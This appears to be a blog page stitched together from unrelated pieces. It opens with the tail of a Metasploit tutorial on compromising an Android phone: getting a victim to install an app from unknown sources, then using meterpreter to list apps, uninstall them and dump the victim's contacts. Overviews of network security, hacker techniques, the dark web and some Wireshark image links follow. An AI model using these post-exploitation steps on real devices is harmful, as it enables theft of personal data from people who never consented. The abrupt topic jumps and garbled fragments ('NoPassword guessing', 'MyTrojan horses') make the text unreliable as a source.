After downloading it successfully, select the app to install.
So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.
Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.
Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.
Post Exploitation
Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.
You can interact with any session by typing sessions -i [session ID]
After entering the session, type “help” to list down all the commands we can put forward in this session.
You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.
You will also find some network commands including portfwd and route
Some powerful system commands to get user ID, get a shell or getting the complete system information.
Type “app_list” and it will show you all the installed apps on the device
We also have the power to uninstall any app from the Android device
Extracting Contacts from an Android Device
Now let extract some contacts from the target device by typing “dump” and double tab
It will show all the options to extract from the device. Type “dump_contacts” and enter
It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”
This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.
There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.
A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.
Network security is the practice of preventing and protecting against unauthorized intrusion into corporate networks. As a philosophy, it complements endpoint security, which focuses on individual devices; network security instead focuses on how those devices interact, and on the connective tissue between them.
The venerable SANS Institute takes the definition of network security a bit farther:
Network security is the process of taking physical and software preventative measures to protect the underlying networking infrastructure from unauthorized access, misuse, malfunction, modification, destruction, or improper disclosure, thereby creating a secure platform for computers, users, and programs to perform their permitted critical functions within a secure environment.
But the overall thrust is the same: network security is implemented by the tasks and tools you use to prevent unauthorized people or programs from accessing your networks and the devices connected to them. In essence, your computer can’t be hacked if hackers can’t get to it over the network.
Network security basics
Definitions are fine as top-level statements of intent. But how do you lay out a plan for implementing that vision? Stephen Northcutt wrote a primer on the basics of network security for over a decade ago, but we feel strongly that his vision of the three phases of network security is still relevant and should be the underlying framework for your strategy. In his telling, network security consists of:
Protection: You should configure your systems and networks as correctly as possible
Detection: You must be able to identify when the configuration has changed or when some network traffic indicates a problem
Reaction: After identifying problems quickly, you must respond to them and return to a safe state as rapidly as possible
This, in short, is a defense in depth strategy. If there’s one common theme among security experts, it’s that relying on one single line of defense is dangerous, because any single defensive tool can be defeated by a determined adversary. Your network isn’t a line or a point: it’s a territory, and even if an attacker has invaded part of it, you still have the resources to regroup and expel them, if you’ve organized your defense properly.
Network security methods
To implement this kind of defense in depth, there are a variety of specialized techniques and types of network security you will want to roll out. Cisco, a networking infrastructure company, uses the following schema to break down the different types of network security, and while some of it is informed by their product categories, it’s a useful way to think about the different ways to secure a network.
Access control: You should be able to block unauthorized users and devices from accessing your network. Users that are permitted network access should only be able to work with the limited set of resources for which they’ve been authorized.
Anti-malware: Viruses, worms, and trojans by definition attempt to spread across a network, and can lurk dormant on infected machines for days or weeks. Your security effort should do its best to prevent initial infection and also root out malware that does make its way onto your network.
Application security: Insecure applications are often the vectors by which attackers get access to your network. You need to employ hardware, software, and security processes to lock those apps down.
Behavioral analytics: You should know what normal network behavior looks like so that you can spot anomalies or breaches as they happen.
Data loss prevention: Human beings are inevitably the weakest security link. You need to implement technologies and processes to ensure that staffers don’t deliberately or inadvertently send sensitive data outside the network.
Email security: Phishing is one of the most common ways attackers gain access to a network. Email security tools can block both incoming attacks and outbound messages with sensitive data.
Firewalls: Perhaps the granddaddy of the network security world, they follow the rules you define to permit or deny traffic at the border between your network and the internet, establishing a barrier between your trusted zone and the wild west outside. They don’t preclude the need for a defense-in-depth strategy, but they’re still a must-have.
Intrusion detection and prevention: These systems scan network traffic to identify and block attacks, often by correlating network activity signatures with databases of known attack techniques.
Mobile device and wireless security: Wireless devices have all the potential security flaws of any other networked gadget — but also can connect to just about any wireless network anywhere, requiring extra scrutiny.
Network segmentation: Software-defined segmentation puts network traffic into different classifications and makes enforcing security policies easier.
Security information and event management (SIEM): These products aim to automatically pull together information from a variety of network tools to provide data you need to identify and respond to threats.
VPN: A tool (typically based on IPsec or SSL) that authenticates the communication between a device and a secure network, creating a secure, encrypted “tunnel” across the open internet.
Web security: You need to be able to control internal staff’s web use in order to block web-based threats from using browsers as a vector to infect your network.
Network security and the cloud
More and more enterprises are offloading some of their computing needs to cloud service providers, creating hybrid infrastructures where their own internal network has to interoperate seamlessly — and securely — with servers hosted by third parties. Sometimes this infrastructure itself is a self-contained network, which can be either physical (several cloud servers working together) or virtual (multiple VM instances running together and “networking” with each other on a single physical server).
To handle the security aspects, many cloud vendors establish centralized security control policies on their own platform. However, the trick here is that those security systems won’t always match up with your policies and procedures for your internal networks, and this mismatch can add to the workload for network security pros. There are a variety of tools and techniques available to you that can help ease some of this worry, but the truth is that this area is still in flux and the convenience of the cloud can mean network security headaches for you.
Network security software
To cover all those bases, you’ll need a variety of software and hardware tools in your toolkit. Most venerable, as we’ve noted, is the firewall. The drumbeat has been to say that the days when a firewall was the sum total of your network security is long gone, with defense in depth needed to fight threats behind (and even in front of) the firewall. Indeed, it seems that one of the nicest things you can say about a firewall product in a review is that calling it a firewall is selling it short.
But firewalls can’t be jettisoned entirely. They’re properly one element in your hybrid defense-in-depth strategy. And as eSecurity Planet explains, there are a number of different firewall types, many of which map onto the different types of network security we covered earlier:
Network firewalls
Next-generation firewalls
Web application firewalls
Database firewalls
Unified threat management
Cloud firewalls
Container firewalls
Network segmentation firewalls
Beyond the firewall, a network security pro will deploy a number of tools to keep track of what’s happening on their networks. Some of these tools are corporate products from big vendors, while others come in the form of free, open source utilities that sysadmins have been using since the early days of Unix. A great resource is SecTools.org, which maintains a charmingly Web 1.0 website that keeps constant track of the most popular network security tools, as voted on by users. Top categories include:
Packet sniffers, which give deep insight into data traffic
Vulnerability scanners like Nessus
Intrusion detection and prevention software, like the legendary Snort
Penetration testing software
That last category might raise some eyebrows — after all, what’s penetration testing if not an attempt to hack into a network? But part of making sure you’re locked down involves seeing how hard or easy it is to break in, and pros know it; ethical hacking is an important part of network security. That’s why you’ll see tools like Aircrack — which exists to sniff out wireless network security keys — alongside staid corporate offerings that cost tens of thousands of dollars on the SecTools.org list.
In an environment where you need to get many tools to work together, you might also want to deploy SIEM software, which we touched on above. SIEM products evolved from logging software, and analyze network data collected by a number of different tools to detect suspicious behavior on your network.
A security hacker is someone who explores methods for breaching defenses and exploiting weaknesses in a computer system or network. Hackers may be motivated by a multitude of reasons, such as profit, protest, information gathering, challenge, recreation, or to evaluate system weaknesses to assist in formulating defenses against potential hackers. The subculture that has evolved around hackers is often referred to as the “computer underground”.
*Longstanding controversy surrounds the meaning of the term “hacker“. In this controversy, computer programmers reclaim the term hacker, arguing that it refers simply to someone with an advanced understanding of computers and computer networks and that cracker is the more appropriate term for those who break into computers, whether computer criminals (black hats) or computer security experts (white hats). A 2014 article noted that “… the black-hat meaning still prevails among the general public
Different types of attack
A typical approach in an attack on Internet-connected system is:
Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.
In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.
Security exploits
A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, cross-site scripting and cross-site request forgery which abuse security holes that may result from substandard programming practice. Other exploits would be able to be used through File Transfer Protocol (FTP), Hypertext Transfer Protocol (HTTP), PHP, SSH, Telnet and some Web pages. These are very common in Web site and Web domain hacking.
Techniques
Vulnerability scanner
A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses. Hackers also commonly use port scanners. These check to see which ports on a specified computer are “open” or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Firewalls defend computers from intruders by limiting access to ports and machines, but they can still be circumvented.)
Finding vulnerabilities
Hackers may also attempt to find vulnerabilities manually. A common approach is to search for possible vulnerabilities in the code of the computer system then test them, sometimes reverse engineering the software if the code is not provided. Experienced hackers can easily find patterns in code to find common vulnerabilities.
Brute-force attack
NoPassword guessing. This method is very fast when used to check all short passwords, but for longer passwords other methods such as the dictionary attack are used, because of the time a brute-force search takes.
Password cracking
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. Common approaches include repeatedly trying guesses for the password, trying the most common passwords by hand, and repeatedly trying passwords from a “dictionary”, or a text file with many passwords.
Packet analyzer
A packet analyzer (“packet sniffer”) is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.
Spoofing attack (phishing)
A spoofing attack involves one program, system or website that successfully masquerades as another by falsifying data and is thereby treated as a trusted system by a user or another program — usually to fool programs, systems or users into revealing confidential information, such as user names and passwords.
Rootkit
A rootkit is a program that uses low-level, hard-to-detect methods to subvert control of an operating system from its legitimate operators. Rootkits usually obscure their installation and attempt to prevent their removal through a subversion of standard system security. They may include replacements for system binaries, making it virtually impossible for them to be detected by checking process tables.
Social engineering
In the second stage of the targeting process, hackers often use social engineering tactics to get enough information to access the network. They may contact the system administrator and pose as a user who cannot get access to his or her system. This technique is portrayed in the 1995 film Hackers, when protagonist Dade “Zero Cool” Murphy calls a somewhat clueless employee in charge of security at a television network. Posing as an accountant working for the same company, Dade tricks the employee into giving him the phone number of a modem so he can gain access to the company’s computer system.
MyTrojan horses
A Trojan horse is a program that seems to be doing one thing but is actually doing another. It can be used to set up a back door in a computer system, enabling the intruder to gain access later. (The name refers to the horse from the Trojan War, with the conceptually similar function of deceiving defenders into bringing an intruder into a protected area.)
Computer virus
A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. By doing this, it behaves similarly to a biological virus, which spreads by inserting itself into living cells. While some viruses are harmless or mere hoaxes, most are considered malicious.
Computer worm
Like a virus, a worm is also a self-replicating program. It differs from a virus in that (a.) it propagates through computer networks without user intervention; and (b.) does not need to attach itself to an existing program. Nonetheless, many people use the terms “virus” and “worm” interchangeably to describe any self-propagating program.
Keystroke logging
A keylogger is a tool designed to record (“log”) every keystroke on an affected machine for later retrieval, usually to allow the user of this tool to gain access to confidential information typed on the affected machine. Some keyloggers use virus-, trojan-, and rootkit-like methods to conceal themselves. However, some of them are used for legitimate purposes, even to enhance computer security. For example, a business may maintain a keylogger on a computer used at a point of sale to detect evidence of employee fraud.
Attack patterns
Attack patterns are defined as series of repeatable steps that can be applied to simulate an attack against the security of a system. They can be used for testing purposes or locating potential vulnerabilities. They also provide, either physically or in reference, a common solution pattern for preventing a given attack.
Types of Hackers around the Globe
White, black, and grey refer to the relationship between the hacker and the systems they are attacking.
‘Black Hat’ Hackers
The term “black hat” originated from Western movies, where the bad guys wore black hats and the good guys wore white hats.[1]
A black-hat hacker is an individual who attempts to gain unauthorized entry into a system or network to exploit them for malicious reasons. The black-hat hacker does not have any permission or authority to compromise their targets. They try to inflict damage by compromising security systems, altering functions of websites and networks, or shutting down systems. They often do so to steal or gain access to passwords, financial information, and other personal data.
‘White Hat’ Hackers
White-hat hackers, on the other hand, are deemed to be the good guys, working with organizations to strengthen the security of a system. A white hat has permission to engage the targets and to compromise them within the prescribed rules of engagement.
White-hat hackers are often referred to as ethical hackers. This individual specializes in ethical hacking tools, techniques, and methodologies to secure an organization’s information systems.
Unlike black-hat hackers, ethical hackers exploit security networks and look for backdoors when they are legally permitted to do so. White-hat hackers always disclose every vulnerability they find in the company’s security system so that it can be fixed before they are being exploited by malicious actors.
Some Fortune 50 companies like Facebook, Microsoft, and Google also use white-hat hackers.
‘Grey Hat’ Hackers
Grey hats exploit networks and computer systems in the way that black hats do, but do so without any malicious intent, disclosing all loopholes and vulnerabilities to law enforcement agencies or intelligence agencies.
Usually, grey-hat hackers surf the net and hack into computer systems to notify the administrator or the owner that their system/network contains one or more vulnerabilities that must be fixed immediately. Grey hats may also extort the hacked, offering to correct the defect for a nominal fee.
The dark web is a part of the internet that isn’t indexed by search engines. You’ve no doubt heard talk of the “dark web” as a hotbed of criminal activity — and it is. Researchers Daniel Moore and Thomas Rid of King’s College in London classified the contents of 2,723 live dark web sites over a five-week period in 2015 and found that 57% host illicit material.
A 2019 study, Into the Web of Profit, conducted by Dr. Michael McGuires at the University of Surrey, shows that things have become worse. The number of dark web listings that could harm an enterprise has risen by 20% since 2016. Of all listings (excluding those selling drugs), 60% could potentially harm enterprises.
You can buy credit card numbers, all manner of drugs, guns, counterfeit money, stolen subscription credentials, hacked Netflix accounts and software that helps you break into other people’s computers. Buy login credentials to a $50,000 Bank of America account for $500. Get $3,000 in counterfeit $20 bills for $600. Buy seven prepaid debit cards, each with a $2,500 balance, for $500 (express shipping included). A “lifetime” Netflix premium account goes for $6. You can hire hackers to attack computers for you. You can buy usernames and passwords.
The terms “deep web” and “dark web” are sometimes used interchangeably, but they are not the same. Deep web refers to anything on the internet that is not indexed by and, therefore, accessible via a search engine like Google. Deep web content includes anything behind a paywall or requires sign-in credentials. It also includes any content that its owners have blocked web crawlers from indexing.
Medical records, fee-based content, membership websites, and confidential corporate web pages are just a few examples of what makes up the deep web. Estimates place the size of the deep web at between 96% and 99% of the internet. Only a tiny portion of the internet is accessible through a standard web browser—generally known as the “clear web”.
The dark web is a subset of the deep web that is intentionally hidden, requiring a specific browser—Tor—to access, as explained below. No one really knows the size of the dark web, but most estimates put it at around 5% of the total internet. Again, not all the dark web is used for illicit purposes despite its ominous-sounding.
Dark web tools and services that present enterprise risk
The Into the Web of Profit report identified 12 categories of tools or services that could present a risk in the form of a network breach or data compromise:
Infection or attacks, including malware, distributed denial of service (DDoS) and botnets
Access, including remote access Trojans (RATs), keyloggers and exploits
Espionage, including services, customization and targeting
Support services such as tutorials
Credentials
Phishing
Refunds
Customer data
Operational data
Financial data
Intellectual property/trade secrets
Other emerging threats
The report also outlined three risk variables for each category:
Devaluing the enterprise, which could include undermining brand trust, reputational damage or losing ground to a competitor
Disrupting the enterprise, which could include DDoS attacks or other malware that affects business operations
Defrauding the enterprise, which could include IP theft or espionage that impairs a company’s ability to compete or causes a direct financial l0oss
All this activity, this vision of a bustling marketplace, might make you think that navigating the dark web is easy. It isn’t. The place is as messy and chaotic as you would expect when everyone is anonymous, and a substantial minority are out to scam others.
Accessing the dark web requires the use of an anonymizing browser called Tor. The Tor browser routes your web page requests through a series of proxy servers operated by thousands of volunteers around the globe, rendering your IP address unidentifiable and untraceable. Tor works like magic, but the result is an experience that’s like the dark web itself: unpredictable, unreliable and maddeningly slow.
Still, for those willing to put up with the inconvenience, the dark web provides a memorable glimpse at the seamy underbelly of the human experience – without the risk of skulking around in a dark alley.
Dark web search engine
Dark web search engines exist, but even the best are challenged to keep up with the constantly shifting landscape. The experience is reminiscent of searching the web in the late 1990s. Even one of the best search engines, called Grams, returns results that are repetitive and often irrelevant to the query. Link lists like The Hidden Wiki are another option, but even indices also return a frustrating number of timed-out connections and 404 errors.
Dark web sites
Dark web sites look pretty much like any other site, but there are important differences. One is the naming structure. Instead of ending in .com or .co, dark web sites end in .onion. That’s “a special-use top level domain suffix designating an anonymous hidden service reachable via the Tor network,” according to Wikipedia. Browsers with the appropriate proxy can reach these sites, but others can’t.
Dark web sites also use a scrambled naming structure that creates URLs that are often impossible to remember. For example, a popular commerce site called Dream Market goes by the unintelligible address of “eajwlvm3z2lcca76.onion.”
Many dark websites are set up by scammers, who constantly move around to avoid the wrath of their victims. Even commerce sites that may have existed for a year or more can suddenly disappear if the owners decide to cash in and flee with the escrow money they’re holding on behalf of customers.
Law enforcement officials are getting better at finding and prosecuting owners of sites that sell illicit goods and services. In the summer of 2017, a team of cyber cops from three countries successfully shut down AlphaBay, the dark web’s largest source of contraband, sending shudders throughout the network. But many merchants simply migrated elsewhere.
The anonymous nature of the Tor network also makes it especially vulnerable to DDoS, said Patrick Tiquet, Director of Security & Architecture at Keeper Security, and the company’s resident expert on the topic. “Sites are constantly changing addresses to avoid DDoS, which makes for a very dynamic environment,” he said. As a result, “The quality of search varies widely, and a lot of material is outdated.”
Commerce on the dark web
The dark web has flourished thanks to bitcoin, the crypto-currency that enables two parties to conduct a trusted transaction without knowing each other’s identity. “Bitcoin has been a major factor in the growth of the dark web, and the dark web has been a big factor in the growth of bitcoin,” says Tiquet.
Nearly all dark web commerce sites conduct transactions in bitcoin or some variant, but that doesn’t mean it’s safe to do business there. The inherent anonymity of the place attracts scammers and thieves, but what do you expect when buying guns or drugs is your objective?
Dark web commerce sites have the same features as any e-retail operation, including ratings/reviews, shopping carts and forums, but there are important differences. One is quality control. When both buyers and sellers are anonymous, the credibility of any ratings system is dubious. Ratings are easily manipulated, and even sellers with long track records have been known to suddenly disappear with their customers’ crypto-coins, only to set up shop later under a different alias.
Most e-commerce providers offer some kind of escrow service that keeps customer funds on hold until the product has been delivered. However, in the event of a dispute don’t expect service with a smile. It’s pretty much up to the buyer and the seller to duke it out. Every communication is encrypted, so even the simplest transaction requires a PGP key.
Even completing a transaction is no guarantee that the goods will arrive. Many need to cross international borders, and customs officials are cracking down on suspicious packages. The dark web news site Deep.Dot.Web teems with stories of buyers who have been arrested or jailed for attempted purchases.
Is the dark web illegal?
We don’t want to leave you with the impression that everything on the dark web is nefarious or illegal. The Tor network began as an anonymous communications channel, and it still serves a valuable purpose in helping people communicate in environments that are hostile to free speech. “A lot of people use it in countries where there’s eavesdropping or where internet access is criminalized,” Tiquet said.
If you want to learn all about privacy protection or cryptocurrency, the dark web has plenty to offer. There are a variety of private and encrypted email services, instructions for installing an anonymous operating system and advanced tips for the privacy-conscious.
There’s also material that you wouldn’t be surprised to find on the public web, such as links to full-text editions of hard-to-find books, collections of political news from mainstream websites and a guide to the steam tunnels under the Virginia Tech campus. You can conduct discussions about current events anonymously on Intel Exchange. There are several whistleblower sites, including a dark web version of Wikileaks. Pirate Bay, a BitTorrent site that law enforcement officials have repeatedly shut down, is alive and well there. Even Facebook has a dark web presence.
“More and more legitimate web companies are starting to have presences there,” Tiquet said. “It shows that they’re aware, they’re cutting edge and in the know.”
There’s also plenty of practical value for some organizations. Law enforcement agencies keep an ear to the ground on the dark web looking for stolen data from recent security breaches that might lead to a trail to the perpetrators. Many mainstream media organizations monitor whistleblower sites looking for news.
Staying on top of the hacker underground
Keeper’s Patrick Tiquet checks in regularly because it’s important for him to be on top of what’s happening in the hacker underground. “I use the dark web for situational awareness, threat analysis and keeping an eye on what’s going on,” he said will. “I want to know what information is available and have an external lens into the digital assets that are being monetized – this gives us insight on what hackers are targeting.”
If you find your own information on the dark web, there’s precious little you can do about it, but at least you’ll know you’ve been compromised. Bottom line: If you can tolerate the lousy performance, unpredictable availability, and occasional shock factor of the dark web, it’s worth a visit. Just don’t buy anything there.
:max_bytes(150000):strip_icc():format(webp)/001_wireshark-tutorial-4143298-52d1294a66f64810b14dbfc6fdbe00de.jpg)
:max_bytes(150000):strip_icc():format(webp)/001-wireshark-tutorial-4143298-8944764352c445c89af8571085055965.jpg)
:max_bytes(150000):strip_icc():format(webp)/002-wireshark-tutorial-4143298-09827053b9cd4445ac165d68a0039808.jpg)
:max_bytes(150000):strip_icc():format(webp)/003-wireshark-tutorial-4143298-024370e017284dc0a251f91a3566cf06.jpg)
:max_bytes(150000):strip_icc():format(webp)/004-wireshark-tutorial-4143298-3db6aeba8777467c8fc3e42ac304f3f6.jpg)
:max_bytes(150000):strip_icc():format(webp)/005-wireshark-tutorial-4143298-c60e3bb4537a4615b8326d5ff8550407.jpg)
:max_bytes(150000):strip_icc():format(webp)/006-wireshark-tutorial-4143298-016d2b41501149d994d0d9e78239d964.jpg)
:max_bytes(150000):strip_icc():format(webp)/008_wireshark-tutorial-4143298-7fc1de4be4e746278f59f2179a453528.jpg)
:max_bytes(150000):strip_icc():format(webp)/007-wireshark-tutorial-4143298-ac0e56f1a0984c1b93a91b1641c7fe88.jpg)
:max_bytes(150000):strip_icc():format(webp)/008-wireshark-tutorial-4143298-13534b80059945e88759286cb3338360.jpg)
:max_bytes(150000):strip_icc():format(webp)/009-wireshark-tutorial-4143298-490a6676280b43cd900557647ff9e92d.jpg)
:max_bytes(150000):strip_icc():format(webp)/010-wireshark-tutorial-4143298-9b5ba526d6e54f8bb3ac49eaea6d08fa.jpg)
:max_bytes(150000):strip_icc():format(webp)/011-wireshark-tutorial-4143298-0b7390128b5a47c38aca851eeed120b5.jpg)
:max_bytes(150000):strip_icc():format(webp)/012-wireshark-tutorial-4143298-5e45505c0f434a9ba2d3a8f70a850617.jpg)
:max_bytes(150000):strip_icc():format(webp)/013-wireshark-tutorial-4143298-f169e33e47ba4aafb336b9d47029867d.jpg)
:max_bytes(150000):strip_icc():format(webp)/014-wireshark-tutorial-4143298-f09d24778ff94ff29a2bbd3ee883fc4c.jpg)
:max_bytes(150000):strip_icc():format(webp)/wireshark-colors-59512e8f3df78cae8137715b.png)
:max_bytes(150000):strip_icc():format(webp)/015-wireshark-tutorial-4143298-91567e80185c4f16bfc46f6793c0301a.jpg)
:max_bytes(150000):strip_icc():format(webp)/020__wireshark-tutorial-4143298-24bfe8984431438b9ba2ec43f701607d.jpg)
learngram.wordpress.com 